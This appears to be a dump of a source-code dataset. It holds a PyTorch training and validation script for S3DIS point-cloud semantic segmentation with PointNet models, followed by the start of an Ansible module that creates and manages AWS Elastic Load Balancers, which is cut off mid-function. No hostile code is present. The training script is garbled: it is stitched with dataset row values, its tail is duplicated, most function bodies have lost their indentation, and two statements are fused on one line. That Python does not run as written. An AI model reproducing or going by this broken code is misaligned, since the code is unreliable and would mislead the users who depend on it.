            subIoUs, submIoU = sub_s3dis_metrics(config.num_classes, vote_logits,
                                                 test_loader.dataset.sub_clouds_points_labels, val_proportions)
            logger.info(f'E{epoch} V{v} * sub_mIoU {submIoU:.3%}')
            logger.info(f'E{epoch} V{v} * sub_msIoU {subIoUs}')

            IoUs, mIoU = s3dis_metrics(config.num_classes, vote_logits, validation_proj, validation_labels)
            logger.info(f'E{epoch} V{v} * mIoU {mIoU:.3%}')
            logger.info(f'E{epoch} V{v} * msIoU {IoUs}')

    return mIoU
if __name__ == "__main__":
    # load config
    args, config = parse_config()
    # One process per GPU: bind this process to its local GPU, then join the
    # NCCL process group (env:// reads MASTER_ADDR/PORT, RANK, WORLD_SIZE).
    torch.cuda.set_device(config.local_rank)
    torch.distributed.init_process_group(backend='nccl', init_method='env://')
    torch.backends.cudnn.enabled = True
    torch.backends.cudnn.benchmark = True
    torch.backends.cudnn.deterministic = True
    os.makedirs(args.log_dir, exist_ok=True)
    os.environ["JOB_LOG_DIR"] = config.log_dir
    # Only rank 0 writes log files; other ranks log to console.
    logger = setup_logger(output=config.log_dir, distributed_rank=dist.get_rank(), name="s3dis")
    if dist.get_rank() == 0:
        path = os.path.join(config.log_dir, "config.json")
        # save args and config settings to config.json
        # NOTE(review): two sequential json.dump calls write two concatenated
        # JSON objects, which a plain json.load cannot parse — confirm whether
        # this file is ever read back programmatically.
        with open(path, 'w') as f:
            json.dump(vars(args), f, indent=2)
            json.dump(vars(config), f, indent=2)
        # Keep a copy of the yaml config alongside the run logs.
        os.system('cp %s %s' % (args.cfg, config.log_dir))
        logger.info("Full config saved to {}".format(path))
    # main function
    main(config)
| 44.64876 | 160 | 0.617955 | import os
import sys
import time
from datetime import datetime
import json
import random
import numpy as np
import torch
import torch.nn as nn
from torchvision import transforms
import torch.distributed as dist
from torch.utils.tensorboard import SummaryWriter
from torch.nn.parallel import DistributedDataParallel
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(ROOT_DIR)
import argparse
from utils.config import config, update_config
from utils.logger import setup_logger
from models import PointNetSemSeg, PointNet2SSGSemSeg, PointNet2MSGSemSeg , get_masked_CE_loss
from datasets import S3DISSemSeg
import datasets.data_utils as d_utils
from utils.util import AverageMeter, s3dis_metrics, sub_s3dis_metrics, s3dis_part_metrics
from utils.lr_scheduler import get_scheduler
def parse_config():
parser = argparse.ArgumentParser('S3DIS semantic segmentation training')
parser.add_argument('--cfg', type=str, default='project/cfgs/s3dis/pointnet2_msg.yaml', help='config file')
parser.add_argument('--data_root', type=str, default='data', help='root director of dataset')
parser.add_argument('--num_workers', type=int, default=4, help='num of workers to use')
parser.add_argument('--batch_size', type=int, help='batch_size')
parser.add_argument('--num_points', type=int, help='num_points')
parser.add_argument('--num_steps', type=int, help='num_steps')
parser.add_argument('--base_learning_rate', type=float, help='base learning rate')
parser.add_argument('--weight_decay', type=float, help='weight_decay')
parser.add_argument('--epochs', type=int, help='number of training epochs')
parser.add_argument('--start_epoch', type=int, help='used for resume')
parser.add_argument('--load_path', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('--print_freq', type=int, default=10, help='print frequency')
parser.add_argument('--save_freq', type=int, default=10, help='save frequency')
parser.add_argument('--val_freq', type=int, default=10, help='val frequency')
parser.add_argument('--log_dir', type=str, default='log', help='log dir [default: log]')
parser.add_argument("--local_rank", type=int,default=0, help='local rank for DistributedDataParallel')
parser.add_argument("--rng_seed", type=int, default=0, help='manual seed')
args, unparsed = parser.parse_known_args()
update_config(args.cfg)
config.data_root = args.data_root
config.num_workers = args.num_workers
config.load_path = args.load_path
config.print_freq = args.print_freq
config.save_freq = args.save_freq
config.val_freq = args.val_freq
config.rng_seed = args.rng_seed
config.local_rank = args.local_rank
model_name = args.cfg.split('.')[-2].split('/')[-1]
config.model_name = model_name
current_time = datetime.now().strftime('%Y%m%d%H%M%S')
config.log_dir = os.path.join(args.log_dir, 's3dis', f'{model_name}_{int(current_time)}') config.batch_size = args.batch_size
if args.num_points:
config.num_points = args.num_points
if args.num_steps:
config.num_steps = args.num_steps
if args.base_learning_rate:
config.base_learning_rate = args.base_learning_rate
if args.weight_decay:
config.weight_decay = args.weight_decay
if args.epochs:
config.epochs = args.epochs
if args.start_epoch:
config.start_epoch = args.start_epoch
print(args)
print(config)
torch.manual_seed(args.rng_seed)
torch.cuda.manual_seed_all(args.rng_seed)
random.seed(args.rng_seed)
np.random.seed(args.rng_seed)
return args, config
def get_loader(config):
train_transforms = transforms.Compose([
d_utils.PointcloudToTensor(),
d_utils.PointcloudRandomRotate(x_range=config.x_angle_range, y_range=config.y_angle_range,
z_range=config.z_angle_range),
d_utils.PointcloudScaleAndJitter(scale_low=config.scale_low, scale_high=config.scale_high,
std=config.noise_std, clip=config.noise_clip,
augment_symmetries=config.augment_symmetries),
])
test_transforms = transforms.Compose([
d_utils.PointcloudToTensor(),
])
train_dataset = S3DISSemSeg(input_features_dim=config.input_features_dim,
subsampling_parameter=config.sampleDl, color_drop=config.color_drop,
in_radius=config.in_radius, num_points=config.num_points,
num_steps=config.num_steps, num_epochs=config.epochs,
transforms=train_transforms, split='train')
val_dataset = S3DISSemSeg(input_features_dim=config.input_features_dim,
subsampling_parameter=config.sampleDl, color_drop=config.color_drop,
in_radius=config.in_radius, num_points=config.num_points,
num_steps=config.num_steps, num_epochs=20,
transforms=test_transforms, split='val')
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset, shuffle=False)
train_loader = torch.utils.data.DataLoader(train_dataset,
batch_size=config.batch_size,
shuffle=False,
num_workers=config.num_workers,
pin_memory=True,
sampler=train_sampler,
drop_last=True)
val_sampler = torch.utils.data.distributed.DistributedSampler(val_dataset, shuffle=False)
val_loader = torch.utils.data.DataLoader(val_dataset,
batch_size=config.batch_size,
shuffle=False,
num_workers=config.num_workers,
pin_memory=True,
sampler=val_sampler,
drop_last=False)
return train_loader, val_loader
def load_checkpoint(config, model, optimizer, scheduler):
logger.info("=> loading checkpoint '{}'".format(config.load_path))
checkpoint = torch.load(config.load_path, map_location='cpu')
config.start_epoch = checkpoint['epoch'] + 1
model.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
scheduler.load_state_dict(checkpoint['scheduler'])
logger.info("=> loaded successfully '{}' (epoch {})".format(config.load_path, checkpoint['epoch']))
del checkpoint
torch.cuda.empty_cache()
def save_checkpoint(config, epoch, model, optimizer, scheduler):
logger.info('==> Saving...')
state = {
'config': config,
'model': model.state_dict(),
'optimizer': optimizer.state_dict(),
'scheduler': scheduler.state_dict(),
'epoch': epoch,
}
torch.save(state, os.path.join(config.log_dir, 'current.pth'))
if epoch % config.save_freq == 0:
torch.save(state, os.path.join(config.log_dir, f'ckpt_epoch_{epoch}.pth'))
logger.info("Saved in {}".format(os.path.join(config.log_dir, f'ckpt_epoch_{epoch}.pth')))
def main(config):
train_loader, val_loader = get_loader(config)
n_data = len(train_loader.dataset)
logger.info(f"length of training dataset: {n_data}")
n_data = len(val_loader.dataset)
logger.info(f"length of validation dataset: {n_data}")
if config.model_name == 'pointnet':
model = PointNetSemSeg(config,config.input_features_dim)
elif config.model_name =='pointnet2_ssg':
model = PointNet2SSGSemSeg(config,config.input_features_dim)
elif config.model_name =='pointnet2_msg':
model = PointNet2MSGSemSeg(config,config.input_features_dim)
else:
raise NotImplementedError("error")
criterion = get_masked_CE_loss()
model.cuda()
criterion.cuda()
if config.optimizer == 'sgd':
optimizer = torch.optim.SGD(model.parameters(),
lr=config.batch_size * dist.get_world_size() / 8 * config.base_learning_rate,
momentum=config.momentum,
weight_decay=config.weight_decay)
elif config.optimizer == 'adam':
optimizer = torch.optim.Adam(model.parameters(),
lr=config.base_learning_rate,
weight_decay=config.weight_decay)
elif config.optimizer == 'adamW':
optimizer = torch.optim.AdamW(model.parameters(),
lr=config.base_learning_rate,
weight_decay=config.weight_decay)
else:
raise NotImplementedError(f"Optimizer {config.optimizer} not supported")
scheduler = get_scheduler(optimizer, len(train_loader), config)
model = DistributedDataParallel(model, device_ids=[config.local_rank], broadcast_buffers=False,find_unused_parameters=True)
runing_vote_logits = [np.zeros((config.num_classes, l.shape[0]), dtype=np.float32) for l in
val_loader.dataset.sub_clouds_points_labels]
if config.load_path:
assert os.path.isfile(config.load_path)
load_checkpoint(config, model, optimizer, scheduler)
logger.info("==> checking loaded ckpt")
validate('resume', val_loader, model, criterion, runing_vote_logits, config, num_votes=2)
if dist.get_rank() == 0:
summary_writer = SummaryWriter(log_dir=config.log_dir)
else:
summary_writer = None
for epoch in range(config.start_epoch, config.epochs + 1):
train_loader.sampler.set_epoch(epoch)
val_loader.sampler.set_epoch(epoch)
train_loader.dataset.epoch = epoch - 1
tic = time.time()
loss = train(epoch, train_loader, model, criterion, optimizer, scheduler, config)
logger.info('epoch {}, total time {:.2f}, lr {:.5f}'.format(epoch,
(time.time() - tic),
optimizer.param_groups[0]['lr']))
if epoch % config.val_freq == 0:
validate(epoch, val_loader, model, criterion, runing_vote_logits, config, num_votes=2)
if dist.get_rank() == 0:
save_checkpoint(config, epoch, model, optimizer, scheduler)
if summary_writer is not None:
summary_writer.add_scalar('ins_loss', loss, epoch)
summary_writer.add_scalar('learning_rate', optimizer.param_groups[0]['lr'], epoch)
validate('Last', val_loader, model, criterion, runing_vote_logits, config, num_votes=20)
def train(epoch, train_loader, model, criterion, optimizer, scheduler, config):
model.train()
batch_time = AverageMeter()
data_time = AverageMeter()
loss_meter = AverageMeter()
end = time.time()
for idx, (points, mask, features, points_labels, cloud_label, input_inds) in enumerate(train_loader):
data_time.update(time.time() - end)
bsz = points.size(0)
points = points.cuda(non_blocking=True)
mask = mask.cuda(non_blocking=True)
features = features.cuda(non_blocking=True)
points_labels = points_labels.cuda(non_blocking=True)
if config.model_name == 'pointnet':
pred,_,transform_feature = model(points,mask, features)
loss = criterion(pred,points_labels,mask,transform_feature)
else:
pred = model(points,mask, features)
loss = criterion(pred,points_labels,mask)
optimizer.zero_grad()
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), 10)
optimizer.step()
scheduler.step()
loss_meter.update(loss.item(), bsz)
batch_time.update(time.time() - end)
end = time.time()
if idx % config.print_freq == 0:
logger.info(f'Train: [{epoch}/{config.epochs + 1}][{idx}/{len(train_loader)}]\t'
f'T {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
f'DT {data_time.val:.3f} ({data_time.avg:.3f})\t'
f'loss {loss_meter.val:.3f} ({loss_meter.avg:.3f})')
return loss_meter.avg
def validate(epoch, test_loader, model, criterion, runing_vote_logits, config, num_votes=10):
    """Evaluate the model with multi-vote test-time augmentation.

    Each vote runs the whole validation set through the model (votes after the
    first apply random rotation/scale/jitter), accumulating per-point logits
    into ``vote_logits_sum``/``vote_counts`` and an exponentially smoothed
    copy in ``runing_vote_logits`` (mutated in place).  Part-level, sub-cloud
    and full-cloud mIoU metrics are logged after every vote.

    Args:
        epoch: current epoch number, or a string tag (e.g. 'Last') for the
            final evaluation pass.
        test_loader: DataLoader over sub-sampled validation point clouds.
        model: network in eval mode producing per-point class logits.
        criterion: loss function, used here only for reporting.
        runing_vote_logits: per-cloud running logit buffers, updated in place.
        config: experiment configuration namespace.
        num_votes: number of augmented evaluation passes.

    Returns:
        Full-cloud mean IoU computed after the final vote.
    """
    vote_logits_sum = [np.zeros((config.num_classes, l.shape[0]), dtype=np.float32) for l in
                       test_loader.dataset.sub_clouds_points_labels]
    # Counts start at ~0 (1e-6) so unvoted points never divide by zero.
    vote_counts = [np.zeros((1, l.shape[0]), dtype=np.float32) + 1e-6 for l in
                   test_loader.dataset.sub_clouds_points_labels]
    vote_logits = [np.zeros((config.num_classes, l.shape[0]), dtype=np.float32) for l in
                   test_loader.dataset.sub_clouds_points_labels]
    validation_proj = test_loader.dataset.projections
    validation_labels = test_loader.dataset.clouds_points_labels
    test_smooth = 0.95
    # Per-class point counts over the full validation set, used by the metrics.
    val_proportions = np.zeros(config.num_classes, dtype=np.float32)
    for label_value in range(config.num_classes):
        val_proportions[label_value] = np.sum(
            [np.sum(labels == label_value) for labels in test_loader.dataset.clouds_points_labels])
    batch_time = AverageMeter()
    losses = AverageMeter()
    model.eval()
    with torch.no_grad():
        end = time.time()
        RT = d_utils.BatchPointcloudRandomRotate(x_range=config.x_angle_range, y_range=config.y_angle_range,
                                                 z_range=config.z_angle_range)
        TS = d_utils.BatchPointcloudScaleAndJitter(scale_low=config.scale_low, scale_high=config.scale_high,
                                                   std=config.noise_std, clip=config.noise_clip,
                                                   augment_symmetries=config.augment_symmetries)
        for v in range(num_votes):
            test_loader.dataset.epoch = (0 + v) if isinstance(epoch, str) else (epoch + v) % 20
            predictions = []
            targets = []
            for idx, (points, mask, features, points_labels, cloud_label, input_inds) in enumerate(test_loader):
                # Augment every vote after the first, then rebuild the xyz
                # part of the features from the transformed points.
                if v > 0:
                    points = RT(points)
                    points = TS(points)
                    if config.input_features_dim <= 5:
                        pass
                    elif config.input_features_dim == 6:
                        color = features[:, :3, :]
                        features = torch.cat([color, points.transpose(1, 2).contiguous()], 1)
                    elif config.input_features_dim == 7:
                        color_h = features[:, :4, :]
                        features = torch.cat([color_h, points.transpose(1, 2).contiguous()], 1)
                    else:
                        raise NotImplementedError(
                            f"input_features_dim {config.input_features_dim} in voting not supported")
                points = points.cuda(non_blocking=True)
                mask = mask.cuda(non_blocking=True)
                features = features.cuda(non_blocking=True)
                points_labels = points_labels.cuda(non_blocking=True)
                cloud_label = cloud_label.cuda(non_blocking=True)
                input_inds = input_inds.cuda(non_blocking=True)
                if config.model_name == 'pointnet':
                    pred, _, transform_feature = model(points, mask, features)
                    loss = criterion(pred, points_labels, mask, transform_feature)
                else:
                    pred = model(points, mask, features)
                    loss = criterion(pred, points_labels, mask)
                losses.update(loss.item(), points.size(0))
                bsz = points.shape[0]
                for ib in range(bsz):
                    # BUG FIX: np.bool (a deprecated alias of the builtin) was
                    # removed in NumPy 1.24; use the builtin bool instead.
                    mask_i = mask[ib].cpu().numpy().astype(bool)
                    logits = pred[ib].cpu().numpy()[:, mask_i]
                    inds = input_inds[ib].cpu().numpy()[mask_i]
                    c_i = cloud_label[ib].item()
                    vote_logits_sum[c_i][:, inds] = vote_logits_sum[c_i][:, inds] + logits
                    vote_counts[c_i][:, inds] += 1
                    vote_logits[c_i] = vote_logits_sum[c_i] / vote_counts[c_i]
                    runing_vote_logits[c_i][:, inds] = test_smooth * runing_vote_logits[c_i][:, inds] + \
                        (1 - test_smooth) * logits
                    predictions += [logits]
                    targets += [test_loader.dataset.sub_clouds_points_labels[c_i][inds]]
                batch_time.update(time.time() - end)
                end = time.time()
                if idx % config.print_freq == 0:
                    logger.info(
                        f'Test: [{idx}/{len(test_loader)}]\t'
                        f'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
                        f'Loss {losses.val:.4f} ({losses.avg:.4f})')
            pIoUs, pmIoU = s3dis_part_metrics(config.num_classes, predictions, targets, val_proportions)
            logger.info(f'E{epoch} V{v} * part_mIoU {pmIoU:.3%}')
            logger.info(f'E{epoch} V{v} * part_msIoU {pIoUs}')
            runsubIoUs, runsubmIoU = sub_s3dis_metrics(config.num_classes, runing_vote_logits,
                                                       test_loader.dataset.sub_clouds_points_labels, val_proportions)
            logger.info(f'E{epoch} V{v} * running sub_mIoU {runsubmIoU:.3%}')
            logger.info(f'E{epoch} V{v} * running sub_msIoU {runsubIoUs}')
            subIoUs, submIoU = sub_s3dis_metrics(config.num_classes, vote_logits,
                                                 test_loader.dataset.sub_clouds_points_labels, val_proportions)
            logger.info(f'E{epoch} V{v} * sub_mIoU {submIoU:.3%}')
            logger.info(f'E{epoch} V{v} * sub_msIoU {subIoUs}')
            IoUs, mIoU = s3dis_metrics(config.num_classes, vote_logits, validation_proj, validation_labels)
            logger.info(f'E{epoch} V{v} * mIoU {mIoU:.3%}')
            logger.info(f'E{epoch} V{v} * msIoU {IoUs}')
    return mIoU
if __name__ == "__main__":
    args, config = parse_config()

    # One process per GPU; local_rank selects this process's device before
    # joining the NCCL process group.
    torch.cuda.set_device(config.local_rank)
    torch.distributed.init_process_group(backend='nccl', init_method='env://')

    torch.backends.cudnn.enabled = True
    torch.backends.cudnn.benchmark = True
    torch.backends.cudnn.deterministic = True

    os.makedirs(args.log_dir, exist_ok=True)
    os.environ["JOB_LOG_DIR"] = config.log_dir
    logger = setup_logger(output=config.log_dir, distributed_rank=dist.get_rank(), name="s3dis")

    # Only rank 0 persists the configuration.
    if dist.get_rank() == 0:
        path = os.path.join(config.log_dir, "config.json")
        with open(path, 'w') as f:
            # BUG FIX: the original issued two json.dump() calls back to back,
            # concatenating two JSON documents into one file, which no JSON
            # parser can read.  Emit a single document holding both mappings.
            json.dump({"args": vars(args), "config": vars(config)}, f, indent=2)
        # Copy the config file without spawning a shell; os.system('cp ...')
        # is non-portable and breaks on paths containing spaces.
        import shutil
        shutil.copy(args.cfg, config.log_dir)
        logger.info("Full config saved to {}".format(path))

    main(config)
| true | true |
1c3c8d34fbb6e1c16f04f4c9f1b01e65a09d95d8 | 53,065 | py | Python | Ansible-AWS-Provisioning/collections/ansible_collections/amazon/aws/plugins/modules/ec2_elb_lb.py | ginigangadharan/ansible-real-life | 897c2fc0d05babbb540768b336b6ad399dad5bfa | [
"MIT"
] | 22 | 2021-07-16T08:11:22.000Z | 2022-03-31T07:15:34.000Z | Ansible-AWS-Provisioning/collections/ansible_collections/amazon/aws/plugins/modules/ec2_elb_lb.py | premsagar0228/ansible-real-life | 1a51193b833ab6ad320100472333b9ffb0da39d4 | [
"MIT"
] | null | null | null | Ansible-AWS-Provisioning/collections/ansible_collections/amazon/aws/plugins/modules/ec2_elb_lb.py | premsagar0228/ansible-real-life | 1a51193b833ab6ad320100472333b9ffb0da39d4 | [
"MIT"
] | 39 | 2021-07-05T02:31:42.000Z | 2022-03-31T02:46:03.000Z | #!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
---
module: ec2_elb_lb
version_added: 1.0.0
description:
- Returns information about the load balancer.
- Will be marked changed when called only if state is changed.
short_description: Creates, updates or destroys an Amazon ELB.
author:
- "Jim Dalton (@jsdalton)"
options:
state:
description:
- Create or destroy the ELB.
type: str
choices: [ absent, present ]
required: true
name:
description:
- The name of the ELB.
type: str
required: true
listeners:
description:
- List of ports/protocols for this ELB to listen on (see examples).
type: list
elements: dict
purge_listeners:
description:
- Purge existing listeners on ELB that are not found in listeners.
type: bool
default: yes
instance_ids:
description:
- List of instance ids to attach to this ELB.
type: list
elements: str
purge_instance_ids:
description:
- Purge existing instance ids on ELB that are not found in instance_ids.
type: bool
default: no
zones:
description:
- List of availability zones to enable on this ELB.
type: list
elements: str
purge_zones:
description:
- Purge existing availability zones on ELB that are not found in zones.
type: bool
default: no
security_group_ids:
description:
- A list of security groups to apply to the ELB.
type: list
elements: str
security_group_names:
description:
- A list of security group names to apply to the ELB.
type: list
elements: str
health_check:
description:
- An associative array of health check configuration settings (see examples).
type: dict
access_logs:
description:
- An associative array of access logs configuration settings (see examples).
type: dict
subnets:
description:
- A list of VPC subnets to use when creating ELB. Zones should be empty if using this.
type: list
elements: str
purge_subnets:
description:
      - Purge existing subnets on ELB that are not found in subnets.
type: bool
default: no
scheme:
description:
- The scheme to use when creating the ELB. For a private VPC-visible ELB use C(internal).
- If you choose to update your scheme with a different value the ELB will be destroyed and
recreated. To update scheme you must use the option I(wait).
type: str
choices: ["internal", "internet-facing"]
default: 'internet-facing'
connection_draining_timeout:
description:
- Wait a specified timeout allowing connections to drain before terminating an instance.
type: int
idle_timeout:
description:
- ELB connections from clients and to servers are timed out after this amount of time.
type: int
cross_az_load_balancing:
description:
- Distribute load across all configured Availability Zones.
- Defaults to C(false).
type: bool
stickiness:
description:
- An associative array of stickiness policy settings. Policy will be applied to all listeners (see examples).
type: dict
wait:
description:
- When specified, Ansible will check the status of the load balancer to ensure it has been successfully
removed from AWS.
type: bool
default: no
wait_timeout:
description:
- Used in conjunction with wait. Number of seconds to wait for the ELB to be terminated.
- A maximum of 600 seconds (10 minutes) is allowed.
type: int
default: 60
tags:
description:
- An associative array of tags. To delete all tags, supply an empty dict (C({})).
type: dict
extends_documentation_fragment:
- amazon.aws.aws
- amazon.aws.ec2
requirements:
- python >= 2.6
- boto
'''
EXAMPLES = """
# Note: None of these examples set aws_access_key, aws_secret_key, or region.
# It is assumed that their matching environment variables are set.
# Basic provisioning example (non-VPC)
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: present
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http # options are http, https, ssl, tcp
load_balancer_port: 80
instance_port: 80
proxy_protocol: True
- protocol: https
load_balancer_port: 443
instance_protocol: http # optional, defaults to value of protocol setting
instance_port: 80
# ssl certificate required for https or ssl
ssl_certificate_id: "arn:aws:iam::123456789012:server-certificate/company/servercerts/ProdServerCert"
# Internal ELB example
- amazon.aws.ec2_elb_lb:
name: "test-vpc"
scheme: internal
state: present
instance_ids:
- i-abcd1234
purge_instance_ids: true
subnets:
- subnet-abcd1234
- subnet-1a2b3c4d
listeners:
- protocol: http # options are http, https, ssl, tcp
load_balancer_port: 80
instance_port: 80
# Configure a health check and the access logs
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: present
zones:
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
health_check:
ping_protocol: http # options are http, https, ssl, tcp
ping_port: 80
ping_path: "/index.html" # not required for tcp or ssl
response_timeout: 5 # seconds
interval: 30 # seconds
unhealthy_threshold: 2
healthy_threshold: 10
access_logs:
interval: 5 # minutes (defaults to 60)
s3_location: "my-bucket" # This value is required if access_logs is set
s3_prefix: "logs"
# Ensure ELB is gone
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: absent
# Ensure ELB is gone and wait for check (for default timeout)
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: absent
wait: yes
# Ensure ELB is gone and wait for check with timeout value
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: absent
wait: yes
wait_timeout: 600
# Normally, this module will purge any listeners that exist on the ELB
# but aren't specified in the listeners parameter. If purge_listeners is
# false it leaves them alone
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: present
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
purge_listeners: no
# Normally, this module will leave availability zones that are enabled
# on the ELB alone. If purge_zones is true, then any extraneous zones
# will be removed
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: present
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
purge_zones: yes
# Creates an ELB and assigns a list of subnets to it.
- amazon.aws.ec2_elb_lb:
state: present
name: 'New ELB'
security_group_ids: 'sg-123456, sg-67890'
region: us-west-2
subnets: 'subnet-123456,subnet-67890'
purge_subnets: yes
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
# Create an ELB with connection draining, increased idle timeout and cross availability
# zone load balancing
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
connection_draining_timeout: 60
idle_timeout: 300
cross_az_load_balancing: "yes"
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
# Create an ELB with load balancer stickiness enabled
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
stickiness:
type: loadbalancer
enabled: yes
expiration: 300
# Create an ELB with application stickiness enabled
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
stickiness:
type: application
enabled: yes
cookie: SESSIONID
# Create an ELB and add tags
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
tags:
Name: "New ELB"
stack: "production"
client: "Bob"
# Delete all tags from an ELB
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
tags: {}
"""
import random
import time
try:
import boto
import boto.ec2.elb
import boto.ec2.elb.attributes
import boto.vpc
from boto.ec2.elb.healthcheck import HealthCheck
from boto.ec2.tag import Tag
except ImportError:
pass # Taken care of by ec2.HAS_BOTO
from ansible.module_utils.six import string_types
from ansible.module_utils._text import to_native
from ..module_utils.core import AnsibleAWSModule
from ..module_utils.ec2 import AnsibleAWSError
from ..module_utils.ec2 import HAS_BOTO
from ..module_utils.ec2 import connect_to_aws
from ..module_utils.ec2 import get_aws_connection_info
def _throttleable_operation(max_retries):
def _operation_wrapper(op):
def _do_op(*args, **kwargs):
retry = 0
while True:
try:
return op(*args, **kwargs)
except boto.exception.BotoServerError as e:
if retry < max_retries and e.code in \
("Throttling", "RequestLimitExceeded"):
retry = retry + 1
time.sleep(min(random.random() * (2 ** retry), 300))
continue
else:
raise
return _do_op
return _operation_wrapper
def _get_vpc_connection(module, region, aws_connect_params):
    """Return a boto VPC connection for *region*, failing the module on error.

    :param module: AnsibleAWSModule used to report connection failures
    :param region: AWS region name to connect to
    :param aws_connect_params: extra keyword args (credentials etc.) for connect_to_aws
    """
    try:
        return connect_to_aws(boto.vpc, region, **aws_connect_params)
    except (boto.exception.NoAuthHandlerFound, AnsibleAWSError) as e:
        module.fail_json_aws(e, 'Failed to connect to AWS')
_THROTTLING_RETRIES = 5
class ElbManager(object):
"""Handles ELB creation and destruction"""
    def __init__(self, module, name, listeners=None, purge_listeners=None,
                 zones=None, purge_zones=None, security_group_ids=None,
                 health_check=None, subnets=None, purge_subnets=None,
                 scheme="internet-facing", connection_draining_timeout=None,
                 idle_timeout=None,
                 cross_az_load_balancing=None, access_logs=None,
                 stickiness=None, wait=None, wait_timeout=None, tags=None,
                 region=None,
                 instance_ids=None, purge_instance_ids=None, **aws_connect_params):
        """Capture the desired ELB state and open the AWS connections.

        Parameters mirror the module options (see DOCUMENTATION): the desired
        listeners/zones/subnets/etc. plus the corresponding ``purge_*`` flags.
        Connecting to ELB and looking up the existing load balancer happen
        here; a lookup failure fails the Ansible module immediately.
        """
        self.module = module
        self.name = name
        self.listeners = listeners
        self.purge_listeners = purge_listeners
        self.instance_ids = instance_ids
        self.purge_instance_ids = purge_instance_ids
        self.zones = zones
        self.purge_zones = purge_zones
        self.security_group_ids = security_group_ids
        self.health_check = health_check
        self.subnets = subnets
        self.purge_subnets = purge_subnets
        self.scheme = scheme
        self.connection_draining_timeout = connection_draining_timeout
        self.idle_timeout = idle_timeout
        self.cross_az_load_balancing = cross_az_load_balancing
        self.access_logs = access_logs
        self.stickiness = stickiness
        self.wait = wait
        self.wait_timeout = wait_timeout
        self.tags = tags
        self.aws_connect_params = aws_connect_params
        self.region = region
        # Mutated by the various _set_* helpers as the ELB is reconciled.
        self.changed = False
        # One of 'gone', 'ok', 'created', 'deleted'.
        self.status = 'gone'
        self.elb_conn = self._get_elb_connection()
        try:
            self.elb = self._get_elb()
        except boto.exception.BotoServerError as e:
            module.fail_json_aws(e, msg='Unable to get all load balancers')
        self.ec2_conn = self._get_ec2_connection()
    @_throttleable_operation(_THROTTLING_RETRIES)
    def ensure_ok(self):
        """Create the ELB if absent, otherwise reconcile it to the desired state."""
        if not self.elb:
            # Zones and listeners will be added at creation
            self._create_elb()
        else:
            if self._get_scheme():
                # the only way to change the scheme is by recreating the resource
                self.ensure_gone()
                self._create_elb()
            else:
                self._set_zones()
                self._set_security_groups()
                self._set_elb_listeners()
                self._set_subnets()
        self._set_health_check()
        # boto has introduced support for some ELB attributes in
        # different versions, so we check first before trying to
        # set them to avoid errors
        if self._check_attribute_support('connection_draining'):
            self._set_connection_draining_timeout()
        if self._check_attribute_support('connecting_settings'):
            self._set_idle_timeout()
        if self._check_attribute_support('cross_zone_load_balancing'):
            self._set_cross_az_load_balancing()
        if self._check_attribute_support('access_log'):
            self._set_access_log()
        # add sticky options
        self.select_stickiness_policy()
        # ensure backend server policies are correct
        self._set_backend_policies()
        # set/remove instance ids
        self._set_instance_ids()
        self._set_tags()
    def ensure_gone(self):
        """Destroy the ELB, optionally waiting until AWS confirms removal."""
        if self.elb:
            self._delete_elb()
            if self.wait:
                elb_removed = self._wait_for_elb_removed()
                # Unfortunately even though the ELB itself is removed quickly
                # the interfaces take longer so reliant security groups cannot
                # be deleted until the interface has registered as removed.
                elb_interface_removed = self._wait_for_elb_interface_removed()
                if not (elb_removed and elb_interface_removed):
                    self.module.fail_json(msg='Timed out waiting for removal of load balancer.')
    def get_info(self):
        """Return a dict describing the load balancer for the module result.

        When the ELB cannot be fetched, only name/status/region are reported.
        Otherwise the dict includes DNS name, zones, security groups, subnets,
        stickiness/proxy/backend policies, instance health counts, the health
        check, listeners and (where boto supports them) ELB attributes.
        """
        try:
            check_elb = self.elb_conn.get_all_load_balancers(self.name)[0]
        except Exception:
            check_elb = None
        if not check_elb:
            info = {
                'name': self.name,
                'status': self.status,
                'region': self.region
            }
        else:
            # Stickiness policy names; absent/missing policies yield None.
            try:
                lb_cookie_policy = check_elb.policies.lb_cookie_stickiness_policies[0].__dict__['policy_name']
            except Exception:
                lb_cookie_policy = None
            try:
                app_cookie_policy = check_elb.policies.app_cookie_stickiness_policies[0].__dict__['policy_name']
            except Exception:
